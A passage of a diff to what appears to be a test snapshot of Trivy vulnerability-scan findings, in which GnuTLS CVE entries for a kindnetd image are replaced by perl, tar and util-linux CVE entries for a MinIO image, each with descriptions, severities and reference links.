"https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=31797", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2020-16156", + "installedVersion": "5.32.1-4+deb11u2", + "packageName": "perl-base", + "references": [ + "http://blogs.perl.org/users/neilb/2021/11/addressing-cpan-vulnerabilities-related-to-checksums.html", + "https://access.redhat.com/security/cve/CVE-2020-16156", + "https://blog.hackeriet.no/cpan-signature-verification-vulnerabilities/", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16156", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SD6RYOJII7HRJ6WVORFNVTYNOFY5JDXN/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SZ32AJIV4RHJMLWLU5QULGKMMIHYOMDC/", + "https://metacpan.org/pod/distribution/CPAN/scripts/cpan", + "https://nvd.nist.gov/vuln/detail/CVE-2020-16156", + "https://ubuntu.com/security/notices/USN-5689-1", + "https://ubuntu.com/security/notices/USN-5689-2", + "https://www.cve.org/CVERecord?id=CVE-2020-16156", + ], + }, + "category": "Vulnerability", + "description": "CPAN 2.28 allows Signature Verification Bypass.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "perl-CPAN: Bypass of verification of signatures in CHECKSUMS files", + "references": [ { "type": "URL", - "value": "https://lists.apache.org/thread.html/r5f88bed447742fcc5c47bf1c7be965ef450131914a6e1f85feba2779@%3Cissues.spark.apache.org%3E", + "value": "https://avd.aquasec.com/nvd/cve-2020-16156", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r6ac143ba6dd98bd4bf6bf010d46e56e254056459721ba18822d611f7@%3Cissues.spark.apache.org%3E", + "value": "http://blogs.perl.org/users/neilb/2021/11/addressing-cpan-vulnerabilities-related-to-checksums.html", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r9cbc69e57276413788e90a6ee16c7c034ea4258d31935b70db2bd158@%3Cissues.spark.apache.org%3E", + "value": "https://access.redhat.com/security/cve/CVE-2020-16156", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rcd70a4c88a47a75fd2d5f3ffb7cee8c2a18c713320bd90fdcb57495f@%3Cissues.spark.apache.org%3E", + "value": "https://blog.hackeriet.no/cpan-signature-verification-vulnerabilities/", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf5e1256d870193def4a82ad89ab95e63943a313b5ff0d81aa87e4532@%3Cissues.spark.apache.org%3E", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16156", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rfd5273d72d244178441e6904a2f2b41a3268f569e8092ea0b3b2bb20@%3Cissues.spark.apache.org%3E", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SD6RYOJII7HRJ6WVORFNVTYNOFY5JDXN/", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OSLAE6PP33A7VYRYMYMUVB3U6B26GZER/", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SZ32AJIV4RHJMLWLU5QULGKMMIHYOMDC/", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-20232", + "value": "https://metacpan.org/pod/distribution/CPAN/scripts/cpan", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20210416-0005/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-16156", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5029-1", + "value": "https://ubuntu.com/security/notices/USN-5689-1", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-20232", + "value": "https://ubuntu.com/security/notices/USN-5689-2", }, { "type": "URL", - "value": "https://www.gnutls.org/security-new.html#GNUTLS-SA-2021-03-10", + "value": "https://www.cve.org/CVERecord?id=CVE-2020-16156", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "3.6.7-4+deb10u7", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2020-24659", - "installedVersion": "3.6.7-4+deb10u5", - "packageName": "libgnutls30", + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-31484", + "installedVersion": "5.32.1-4+deb11u2", + "packageName": "perl-base", "references": [ - "http://lists.opensuse.org/opensuse-security-announce/2020-10/msg00054.html", - "http://lists.opensuse.org/opensuse-security-announce/2020-10/msg00060.html", - "https://access.redhat.com/security/cve/CVE-2020-24659", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-24659", - "https://gitlab.com/gnutls/gnutls/-/issues/1071", - "https://linux.oracle.com/cve/CVE-2020-24659.html", - "https://linux.oracle.com/errata/ELSA-2020-5483.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/62BUAI4FQQLG6VTKRT7SUZPGJJ4NASQ3/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AWN56FDLQQXT2D2YHNI4TYH432TDMQ7N/", - "https://nvd.nist.gov/vuln/detail/CVE-2020-24659", - "https://security.gentoo.org/glsa/202009-01", - "https://security.netapp.com/advisory/ntap-20200911-0006/", - "https://ubuntu.com/security/notices/USN-4491-1", - "https://usn.ubuntu.com/4491-1/", - "https://www.cve.org/CVERecord?id=CVE-2020-24659", - "https://www.gnutls.org/security-new.html#GNUTLS-SA-2020-09-04", + "http://www.openwall.com/lists/oss-security/2023/04/29/1", + "http://www.openwall.com/lists/oss-security/2023/05/03/3", + "http://www.openwall.com/lists/oss-security/2023/05/03/5", + "http://www.openwall.com/lists/oss-security/2023/05/07/2", + "https://blog.hackeriet.no/perl-http-tiny-insecure-tls-default-affects-cpan-modules/", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-31484", + "https://github.com/andk/cpanpm/commit/9c98370287f4e709924aee7c58ef21c85289a7f0 (2.35-TRIAL)", + "https://github.com/andk/cpanpm/pull/175", + "https://metacpan.org/dist/CPAN/changes", + "https://ubuntu.com/security/notices/USN-6112-1", + "https://ubuntu.com/security/notices/USN-6112-2", + "https://www.openwall.com/lists/oss-security/2023/04/18/14", ], }, "category": "Vulnerability", - "description": "An issue was discovered in GnuTLS before 3.6.15. A server can trigger a NULL pointer dereference in a TLS 1.3 client if a no_renegotiation alert is sent with unexpected timing, and then an invalid second handshake occurs. The crash happens in the application's error handling path, where the gnutls_deinit function is called after detecting a handshake failure.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "CPAN.pm before 2.35 does not verify TLS certificates when downloading distributions over HTTPS.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "gnutls: Heap buffer overflow in handshake with no_renegotiation alert sent", + "name": "CPAN.pm before 2.35 does not verify TLS certificates when downloading ...", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2020-24659", - }, - { - "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2020-10/msg00054.html", - }, - { - "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2020-10/msg00060.html", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2020-24659", - }, - { - "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-24659", + "value": "https://avd.aquasec.com/nvd/cve-2023-31484", }, { "type": "URL", - "value": "https://gitlab.com/gnutls/gnutls/-/issues/1071", + "value": "http://www.openwall.com/lists/oss-security/2023/04/29/1", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2020-24659.html", + "value": "http://www.openwall.com/lists/oss-security/2023/05/03/3", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2020-5483.html", + "value": "http://www.openwall.com/lists/oss-security/2023/05/03/5", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/62BUAI4FQQLG6VTKRT7SUZPGJJ4NASQ3/", + "value": "http://www.openwall.com/lists/oss-security/2023/05/07/2", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AWN56FDLQQXT2D2YHNI4TYH432TDMQ7N/", + "value": "https://blog.hackeriet.no/perl-http-tiny-insecure-tls-default-affects-cpan-modules/", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-24659", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-31484", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202009-01", + "value": "https://github.com/andk/cpanpm/commit/9c98370287f4e709924aee7c58ef21c85289a7f0 (2.35-TRIAL)", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20200911-0006/", + "value": "https://github.com/andk/cpanpm/pull/175", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4491-1", + "value": "https://metacpan.org/dist/CPAN/changes", }, { "type": "URL", - "value": "https://usn.ubuntu.com/4491-1/", + "value": "https://ubuntu.com/security/notices/USN-6112-1", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2020-24659", + "value": "https://ubuntu.com/security/notices/USN-6112-2", }, { "type": "URL", - "value": "https://www.gnutls.org/security-new.html#GNUTLS-SA-2020-09-04", + "value": "https://www.openwall.com/lists/oss-security/2023/04/18/14", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "3.6.7-4+deb10u9", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-2509", - "installedVersion": "3.6.7-4+deb10u5", - "packageName": "libgnutls30", + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2011-4116", + "installedVersion": "5.32.1-4+deb11u2", + "packageName": "perl-base", "references": [ - "https://access.redhat.com/errata/RHSA-2022:6854", - "https://access.redhat.com/security/cve/CVE-2022-2509", - "https://bugzilla.redhat.com/2108977", - "https://bugzilla.redhat.com/show_bug.cgi?id=2076626", - "https://bugzilla.redhat.com/show_bug.cgi?id=2108635", - "https://bugzilla.redhat.com/show_bug.cgi?id=2108977", - "https://bugzilla.redhat.com/show_bug.cgi?id=2119770", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2509", - "https://errata.almalinux.org/9/ALSA-2022-6854.html", - "https://errata.rockylinux.org/RLSA-2022:6854", - "https://gnutls.org/security-new.html (GNUTLS-SA-2022-07-07)", - "https://gnutls.org/security-new.html#GNUTLS-SA-2022-07-07", - "https://linux.oracle.com/cve/CVE-2022-2509.html", - "https://linux.oracle.com/errata/ELSA-2022-7105.html", - "https://lists.debian.org/debian-lts-announce/2022/08/msg00002.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6FL27JS3VM74YEQU7PGB62USO3KSBYZX/", - "https://lists.gnupg.org/pipermail/gnutls-help/2022-July/004746.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-2509", - "https://ubuntu.com/security/notices/USN-5550-1", - "https://www.cve.org/CVERecord?id=CVE-2022-2509", - "https://www.debian.org/security/2022/dsa-5203", + "http://www.openwall.com/lists/oss-security/2011/11/04/2", + "http://www.openwall.com/lists/oss-security/2011/11/04/4", + "https://access.redhat.com/security/cve/CVE-2011-4116", + "https://github.com/Perl-Toolchain-Gang/File-Temp/issues/14", + "https://nvd.nist.gov/vuln/detail/CVE-2011-4116", + "https://rt.cpan.org/Public/Bug/Display.html?id=69106", + "https://seclists.org/oss-sec/2011/q4/238", + "https://www.cve.org/CVERecord?id=CVE-2011-4116", ], }, "category": "Vulnerability", - "description": "A vulnerability found in gnutls. This security flaw happens because of a double free error occurs during verification of pkcs7 signatures in gnutls_pkcs7_verify function.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "_is_safe in the File::Temp module for Perl does not properly handle symlinks.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "Double free during gnutls_pkcs7_verify", + "name": "perl: File::Temp insecure temporary file handling", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-2509", - }, - { - "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:6854", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-2509", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/2108977", + "value": "https://avd.aquasec.com/nvd/cve-2011-4116", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2076626", + "value": "http://www.openwall.com/lists/oss-security/2011/11/04/2", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2108635", + "value": "http://www.openwall.com/lists/oss-security/2011/11/04/4", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2108977", + "value": "https://access.redhat.com/security/cve/CVE-2011-4116", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2119770", + "value": "https://github.com/Perl-Toolchain-Gang/File-Temp/issues/14", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2509", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2011-4116", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2022-6854.html", + "value": "https://rt.cpan.org/Public/Bug/Display.html?id=69106", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:6854", + "value": "https://seclists.org/oss-sec/2011/q4/238", }, { "type": "URL", - "value": "https://gnutls.org/security-new.html (GNUTLS-SA-2022-07-07)", + "value": "https://www.cve.org/CVERecord?id=CVE-2011-4116", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-31486", + "installedVersion": "5.32.1-4+deb11u2", + "packageName": "perl-base", + "references": [ + "http://www.openwall.com/lists/oss-security/2023/04/29/1", + "http://www.openwall.com/lists/oss-security/2023/05/03/3", + "http://www.openwall.com/lists/oss-security/2023/05/03/5", + "http://www.openwall.com/lists/oss-security/2023/05/07/2", + "https://blog.hackeriet.no/perl-http-tiny-insecure-tls-default-affects-cpan-modules/", + "https://hackeriet.github.io/cpan-http-tiny-overview/", + "https://www.openwall.com/lists/oss-security/2023/04/18/14", + "https://www.openwall.com/lists/oss-security/2023/05/03/4", + "https://www.reddit.com/r/perl/comments/111tadi/psa_httptiny_disabled_ssl_verification_by_default/", + ], + }, + "category": "Vulnerability", + "description": "HTTP::Tiny 0.082, a Perl core module since 5.13.9 and available standalone on CPAN, has an insecure default TLS configuration where users must opt in to verify certificates.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "HTTP::Tiny 0.082, a Perl core module since 5.13.9 and available standa ...", + "references": [ { "type": "URL", - "value": "https://gnutls.org/security-new.html#GNUTLS-SA-2022-07-07", + "value": "https://avd.aquasec.com/nvd/cve-2023-31486", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-2509.html", + "value": "http://www.openwall.com/lists/oss-security/2023/04/29/1", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-7105.html", + "value": "http://www.openwall.com/lists/oss-security/2023/05/03/3", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/08/msg00002.html", + "value": "http://www.openwall.com/lists/oss-security/2023/05/03/5", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6FL27JS3VM74YEQU7PGB62USO3KSBYZX/", + "value": "http://www.openwall.com/lists/oss-security/2023/05/07/2", }, { "type": "URL", - "value": "https://lists.gnupg.org/pipermail/gnutls-help/2022-July/004746.html", + "value": "https://blog.hackeriet.no/perl-http-tiny-insecure-tls-default-affects-cpan-modules/", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-2509", + "value": "https://hackeriet.github.io/cpan-http-tiny-overview/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5550-1", + "value": "https://www.openwall.com/lists/oss-security/2023/04/18/14", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-2509", + "value": "https://www.openwall.com/lists/oss-security/2023/05/03/4", }, { "type": "URL", - "value": "https://www.debian.org/security/2022/dsa-5203", + "value": "https://www.reddit.com/r/perl/comments/111tadi/psa_httptiny_disabled_ssl_verification_by_default/", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "3.6.7-4+deb10u10", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-0361", - "installedVersion": "3.6.7-4+deb10u5", - "packageName": "libgnutls30", + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2005-2541", + "installedVersion": "1.34+dfsg-1", + "packageName": "tar", "references": [ - "https://access.redhat.com/errata/RHSA-2023:1141", - "https://access.redhat.com/security/cve/CVE-2023-0361", - "https://bugzilla.redhat.com/2162596", - "https://bugzilla.redhat.com/show_bug.cgi?id=2131152", - "https://bugzilla.redhat.com/show_bug.cgi?id=2162596", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0361", - "https://errata.almalinux.org/9/ALSA-2023-1141.html", - "https://errata.rockylinux.org/RLSA-2023:1569", - "https://github.com/tlsfuzzer/tlsfuzzer/pull/679", - "https://gitlab.com/gnutls/gnutls/-/issues/1050", - "https://gnutls.org/security-new.html#GNUTLS-SA-2020-07-14", - "https://linux.oracle.com/cve/CVE-2023-0361.html", - "https://linux.oracle.com/errata/ELSA-2023-1569.html", - "https://lists.debian.org/debian-lts-announce/2023/02/msg00015.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UFIA3X4IZ3CW7SRQ2UHNHNPMRIAWF2FI/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WS4KVDOG6QTALWHC2QE4Y7VPDRMLTRWQ/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z634YBXAJ5VLDI62IOPBVP5K6YFHAWCY/", - "https://nvd.nist.gov/vuln/detail/CVE-2023-0361", - "https://security.netapp.com/advisory/ntap-20230324-0005/", - "https://ubuntu.com/security/notices/USN-5901-1", - "https://www.cve.org/CVERecord?id=CVE-2023-0361", + "http://marc.info/?l=bugtraq&m=112327628230258&w=2", + "https://access.redhat.com/security/cve/CVE-2005-2541", + "https://lists.apache.org/thread.html/rc713534b10f9daeee2e0990239fa407e2118e4aa9e88a7041177497c@%3Cissues.guacamole.apache.org%3E", + "https://nvd.nist.gov/vuln/detail/CVE-2005-2541", + "https://www.cve.org/CVERecord?id=CVE-2005-2541", ], }, "category": "Vulnerability", - "description": "A timing side-channel in the handling of RSA ClientKeyExchange messages was discovered in GnuTLS. This side-channel can be sufficient to recover the key encrypted in the RSA ciphertext across a network in a Bleichenbacher style attack. To achieve a successful decryption the attacker would need to send a large amount of specially crafted messages to the vulnerable server. By recovering the secret from the ClientKeyExchange message, the attacker would be able to decrypt the application data exchanged over that connection.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "Tar 1.15.1 does not properly warn the user when extracting setuid or setgid files, which may allow local users or remote attackers to gain privileges.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "timing side-channel in the TLS RSA key exchange code", + "name": "tar: does not properly warn the user when extracting setuid or setgid files", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-0361", + "value": "https://avd.aquasec.com/nvd/cve-2005-2541", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:1141", + "value": "http://marc.info/?l=bugtraq&m=112327628230258&w=2", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2023-0361", + "value": "https://access.redhat.com/security/cve/CVE-2005-2541", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2162596", + "value": "https://lists.apache.org/thread.html/rc713534b10f9daeee2e0990239fa407e2118e4aa9e88a7041177497c@%3Cissues.guacamole.apache.org%3E", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2131152", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2005-2541", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2162596", + "value": "https://www.cve.org/CVERecord?id=CVE-2005-2541", + }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-48303", + "installedVersion": "1.34+dfsg-1", + "packageName": "tar", + "references": [ + "https://access.redhat.com/errata/RHSA-2023:0959", + "https://access.redhat.com/security/cve/CVE-2022-48303", + "https://bugzilla.redhat.com/2149722", + "https://bugzilla.redhat.com/show_bug.cgi?id=2149722", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-48303", + "https://errata.almalinux.org/9/ALSA-2023-0959.html", + "https://errata.rockylinux.org/RLSA-2023:0959", + "https://linux.oracle.com/cve/CVE-2022-48303.html", + "https://linux.oracle.com/errata/ELSA-2023-0959.html", + "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/CRY7VEL4AIG3GLIEVCTOXRZNSVYDYYUD/", + "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/X5VQYCO52Z7GAVCLRYUITN7KXHLRZQS4/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-48303", + "https://savannah.gnu.org/bugs/?62387", + "https://savannah.gnu.org/patch/?10307", + "https://ubuntu.com/security/notices/USN-5900-1", + "https://ubuntu.com/security/notices/USN-5900-2", + "https://www.cve.org/CVERecord?id=CVE-2022-48303", + ], + }, + "category": "Vulnerability", + "description": "GNU Tar through 1.34 has a one-byte out-of-bounds read that results in use of uninitialized memory for a conditional jump. Exploitation to change the flow of control has not been demonstrated. The issue occurs in from_header in list.c via a V7 archive in which mtime has approximately 11 whitespace characters.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "heap buffer overflow at from_header() in list.c via specially crafted checksum", + "references": [ + { + "type": "URL", + "value": "https://avd.aquasec.com/nvd/cve-2022-48303", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0361", + "value": "https://access.redhat.com/errata/RHSA-2023:0959", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-1141.html", + "value": "https://access.redhat.com/security/cve/CVE-2022-48303", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2023:1569", + "value": "https://bugzilla.redhat.com/2149722", }, { "type": "URL", - "value": "https://github.com/tlsfuzzer/tlsfuzzer/pull/679", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2149722", }, { "type": "URL", - "value": "https://gitlab.com/gnutls/gnutls/-/issues/1050", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-48303", }, { "type": "URL", - "value": "https://gnutls.org/security-new.html#GNUTLS-SA-2020-07-14", + "value": "https://errata.almalinux.org/9/ALSA-2023-0959.html", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2023-0361.html", + "value": "https://errata.rockylinux.org/RLSA-2023:0959", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-1569.html", + "value": "https://linux.oracle.com/cve/CVE-2022-48303.html", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2023/02/msg00015.html", + "value": "https://linux.oracle.com/errata/ELSA-2023-0959.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UFIA3X4IZ3CW7SRQ2UHNHNPMRIAWF2FI/", + "value": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/CRY7VEL4AIG3GLIEVCTOXRZNSVYDYYUD/", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WS4KVDOG6QTALWHC2QE4Y7VPDRMLTRWQ/", + "value": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/X5VQYCO52Z7GAVCLRYUITN7KXHLRZQS4/", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z634YBXAJ5VLDI62IOPBVP5K6YFHAWCY/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-48303", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-0361", + "value": "https://savannah.gnu.org/bugs/?62387", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230324-0005/", + "value": "https://savannah.gnu.org/patch/?10307", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5901-1", + "value": "https://ubuntu.com/security/notices/USN-5900-1", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2023-0361", + "value": "https://ubuntu.com/security/notices/USN-5900-2", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-48303", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "3.6.7-4+deb10u9", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-4209", - "installedVersion": "3.6.7-4+deb10u5", - "packageName": "libgnutls30", + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-0563", + "installedVersion": "2.36.1-8+deb11u1", + "packageName": "util-linux", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-4209", - "https://bugzilla.redhat.com/show_bug.cgi?id=2044156", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4209", - "https://gitlab.com/gnutls/gnutls/-/commit/3db352734472d851318944db13be73da61300568", - "https://gitlab.com/gnutls/gnutls/-/issues/1306", - "https://gitlab.com/gnutls/gnutls/-/merge_requests/1503", - "https://nvd.nist.gov/vuln/detail/CVE-2021-4209", - "https://security.netapp.com/advisory/ntap-20220915-0005/", - "https://ubuntu.com/security/notices/USN-5550-1", - "https://ubuntu.com/security/notices/USN-5750-1", - "https://www.cve.org/CVERecord?id=CVE-2021-4209", + "https://access.redhat.com/security/cve/CVE-2022-0563", + "https://blog.trailofbits.com/2023/02/16/suid-logic-bug-linux-readline/", + "https://lore.kernel.org/util-linux/20220214110609.msiwlm457ngoic6w@ws.net.home/T/#u", + "https://nvd.nist.gov/vuln/detail/CVE-2022-0563", + "https://security.netapp.com/advisory/ntap-20220331-0002/", + "https://www.cve.org/CVERecord?id=CVE-2022-0563", ], }, "category": "Vulnerability", - "description": "A NULL pointer dereference flaw was found in GnuTLS. As Nettle's hash update functions internally call memcpy, providing zero-length input may cause undefined behavior. This flaw leads to a denial of service after authentication in rare circumstances.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "A flaw was found in the util-linux chfn and chsh utilities when compiled with Readline support. The Readline library uses an "INPUTRC" environment variable to get a path to the library config file. When the library cannot parse the specified file, it prints an error message containing data from the file. This flaw allows an unprivileged user to read root-owned files, potentially leading to privilege escalation. This flaw affects util-linux versions prior to 2.37.4.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "GnuTLS: Null pointer dereference in MD_UPDATE", + "name": "util-linux: partial disclosure of arbitrary files in chfn and chsh when compiled with libreadline", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-4209", + "value": "https://avd.aquasec.com/nvd/cve-2022-0563", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-4209", + "value": "https://access.redhat.com/security/cve/CVE-2022-0563", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2044156", + "value": "https://blog.trailofbits.com/2023/02/16/suid-logic-bug-linux-readline/", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4209", + "value": "https://lore.kernel.org/util-linux/20220214110609.msiwlm457ngoic6w@ws.net.home/T/#u", }, { "type": "URL", - "value": 